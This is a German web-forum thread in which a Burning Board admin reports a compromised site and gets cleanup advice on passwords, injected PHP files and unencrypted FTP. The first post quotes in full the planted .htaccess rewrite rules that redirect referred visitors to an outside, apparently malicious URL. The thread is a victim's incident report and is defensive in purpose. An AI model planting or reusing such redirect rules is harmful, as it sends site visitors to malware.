yourWBB » WoltLab Burning Board Generation 2 * » Alles von und für das WBB Lite 1.0.x » [WBB Lite 1.0.x] Allg. Fragen und Probleme » Bitte um eure Meinung wegen htaccess Datei

Bitte um eure Meinung wegen htaccess Datei

manu.gruber
Einer Meiner Foren ging vorhin nicht mehr.

Im Forum root Verzeichniss war eine .htaccess Datei mit folgendem Inhalt

Zitat:
<IfModule mod_rewrite.c> RewriteEngine On RewriteBase / RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+) RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/$ [NC] RewriteRule ^.*$ http://app.2need.net/hwes.html?h=1370811 [L,R] </IfModule>


Seit dem ich das gelöscht habe läuft das Board wieder normal.

Auswirkungen waren das offensichtlich die Stylesheet Dateien nicht geladen wurden und das alle links ins niemandsland geführt haben.

Ich kann mir irgendwie auf alles kein beim darauf bilden

Habt ihr eine Idee was das sein könnte.
jacqy
Wenn ich die URL app.2need.net aufrufe springt mein Virenprogramm an.Dieser Link ist schädlich.Du hattest diese hatccess vermutlich nicht erstellt??

Sieht so aus als ob dein FTP gehackt wurde.
manu.gruber
Was soll ich dagegen machen ?
jacqy
Passwörter ändern für FTP Mysql und am besten fürs Forum auch noch. Wo bist du denn gehostet?
manu.gruber
All-inkl.com

Ich habe jetzt mal:

weitgehenst alle htaccess datein gesäubert und auch weitere php dateien wo am anfang eine zeile eingefügt wurde und es wurde ausserdem eine datei immer erstellt "default.php" in verschiedenen Ordnern abgelegt, die habe ich alle gelöscht.

FTP und MYSQL Passwörter letzteres erst nach säubern geändert.

Kanns sein das die DB auch manipuliert wurde ?

Sollte ich andere Passwörter wie von ebay und so auch überall ändern ?
jacqy
Ok.


Sieht anscheind wirklich danach aus als ob dein FTP gehackt wurde.Zwecks DB weiß ich nicht.Das müßte man sich mal anschauen.

Nunja PW ´s sollte man generell öfters mal ändern.Und auch auf die Wahl achten.Auf keine Fall Namen,Geburtsdatum oder ähnliches nehmen.Ein gutes PW besteht aus Zahlen,Buchstaben und Sonderzeichen.So haben Hacker es schwieriger.Schaut aber nach nem ScriptKiddie bei dir aus.
manu.gruber
Scriptkiddie? Glaubst du das sich das eher auf das Forum beschrenkt wie auf andere dinge wie ebay und so ?

Das MySQL PW habe ich bei der Verwaltung über KAS zufällig generieren lassen.

Zum FTP
Ich lade immer via filezilla hoch

jetzt sehe ich da beim Punkt

Verschlüsselung: unverschlüsseltes ftp verwenden
Kann das der grund sein warum er da drann gekommen ist ?

Ich sehe gerade ihr bietet auch Service rund ums WBB an, macht ihr auch umstellungen vom wbblite1 aufs wbb3 ? Habe meine Lizenz verlängert.

Ich wollte im laufe des jahres umsteigen währe es vielleicht gut bald um zu steigen, weil, soweit ich weis wird ja das nur importiert und man hat dann quasi trotzdem ne art frische datenbank ohne altlast von hacks und addons oder ?
dedie
Zitat:
Original von jacqy
Sieht so aus als ob dein FTP gehackt wurde.


Würde ich bei All-inkl.com als Hoster ausschließen, die passen auf ihre Kunden auf.

Das ganze könnte ganz einfach von einem Verseuchten PC aus hochgeladen worden sein, es gab da vor gar nicht so langer Zeit ein Problem ähnlicher Art in Victors-Board
Forensoftware: Burning Board, entwickelt von WoltLab GmbH